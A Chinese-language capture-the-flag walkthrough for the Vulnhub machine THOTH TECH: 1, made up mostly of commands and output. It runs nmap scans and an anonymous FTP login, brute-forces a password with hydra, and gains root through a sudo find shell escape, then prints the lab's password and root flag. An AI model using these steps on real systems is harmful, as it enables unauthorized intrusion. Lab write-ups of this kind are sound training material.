Vulnhub: THOTH TECH: 1
Vulnhub: THOTH TECH: 1
2021-08-24 22:02:27
1. 找到目标:
通过开放端口找到目标192.168.1.105。
┌──(kali㉿kali)-[~] └─$ nmap 192.168.1.1/24 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 20:23 CST Nmap scan report for 192.168.1.1 Host is up (0.0019s latency). Not shown: 997 closed ports PORT STATE SERVICE 53/tcp filtered domain 80/tcp open http 1900/tcp open upnpNmap scan report for 192.168.1.104
Host is up (0.0070s latency).
All 1000 scanned ports on 192.168.1.104 are closedNmap scan report for 192.168.1.105
Host is up (0.00038s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open httpNmap scan report for 192.168.1.106
Host is up (0.00047s latency).
All 1000 scanned ports on 192.168.1.106 are closedNmap scan report for 192.168.1.108
Host is up (0.0057s latency).
All 1000 scanned ports on 192.168.1.108 are closedNmap scan report for 192.168.1.252
Host is up (0.0095s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
80/tcp open http
1900/tcp open upnp
Nmap done: 256 IP addresses (6 hosts up) scanned in 7.30 seconds
2.扫描并分析目标
┌──(kali㉿kali)-[~] └─$ nmap -sC -A 192.168.1.105Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 21:32 CST
Nmap scan report for 192.168.1.105
Host is up (0.00039s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.106
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|End of status
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ac:d2:7b:75:80:67:f2:9d:95:67:52:99:c8:2f🆎7b (RSA)
| 256 78:ca:86:73:b6:87:06:08:eb:7a:9c🆎cf:9d:89:16 (ECDSA)
| 256 93:49:d7:8c:1c:07:7e:8e:79:91:2b:bf:2d:0d:34:6b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.40 seconds
3.查看FTP服务
通过服务扫描可知,FTP服务允许匿名登录,且包含文件note.txt。
登录FTP服务器,下载并查看该文件。
由信息可知,存在一个用户名为pwnlab的ftp用户,且其密码为弱密码。
┌──(kali㉿kali)-[~] └─$ ftp 192.168.1.105 Connected to 192.168.1.105. 220 (vsFTPd 3.0.3) Name (192.168.1.105:kali): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -al 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxr-xr-x 2 65534 65534 4096 Jul 02 09:33 . drwxr-xr-x 2 65534 65534 4096 Jul 02 09:33 .. -rw-r--r-- 1 0 0 110 Jul 02 09:33 note.txt 226 Directory send OK. ftp> get note.txt local: note.txt remote: note.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for note.txt (110 bytes). 226 Transfer complete. 110 bytes received in 0.00 secs (2.9140 MB/s) ftp> exit 221 Goodbye.┌──(kali㉿kali)-[~]
└─$ cat note.txt
Dear pwnlab,
My name is jake. Your password is very weak and easily crackable, I think change your password.
4.密码暴力破解
使用hrdra破解用户pwnlab的登陆密码。
可得用户pwnlabpwnlab的密码为babygirl1。
┌──(kali㉿kali)-[~] └─$ hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt 192.168.1.105 ftp Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-24 21:47:33
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://192.168.1.105:21/
[21][ftp] host: 192.168.1.105 login: pwnlab password: babygirl1
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-24 21:48:31
5.登录服务器
以pwnlab身份登录服务器。
┌──(kali㉿kali)-[~] └─$ ssh pwnlab@192.168.1.105 pwnlab@192.168.1.105's password: Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
- Documentation: https://help.ubuntu.com
- Management: https://landscape.canonical.com
- Support: https://ubuntu.com/advantage
System information as of Tue 24 Aug 2021 01:49:55 PM UTC
System load: 0.0 Processes: 149
Usage of /: 25.0% of 19.56GB Users logged in: 0
Memory usage: 22% IPv4 address for enp0s3: 192.168.1.105
Swap usage: 0%
Super-optimized for small spaces - read how we shrank the memory
footprint of MicroK8s to make it the smallest full K8s around.66 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Aug 24 07:44:49 2021 from 192.168.1.106
pwnlab@thothtech:~$
pwnlab@thothtech:~$ whoami
pwnlab
6.查看用户权限并提升权限
使用命令sudo -l查看用户权限可知,用户pwnlab可以使用以root身份运行程序find。并借此获得root权限。
pwnlab@thothtech:~$ sudo -l Matching Defaults entries for pwnlab on thothtech: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pwnlab may run the following commands on thothtech:
(root) NOPASSWD: /usr/bin/find
pwnlab@thothtech:~$ sudo /usr/bin/find . -exec /bin/bash ; -quit
root@thothtech:/home/pwnlab# whoami
root
root@thothtech:/home/pwnlab#
7.获得通关flag。
root@thothtech:/home/pwnlab# cd /root root@thothtech:~# ls root.txt snap root@thothtech:~# cat root.txt Root flag: d51546d5bcf8e3856c7bff5d201f0df6
good job 😃
root@thothtech:~#
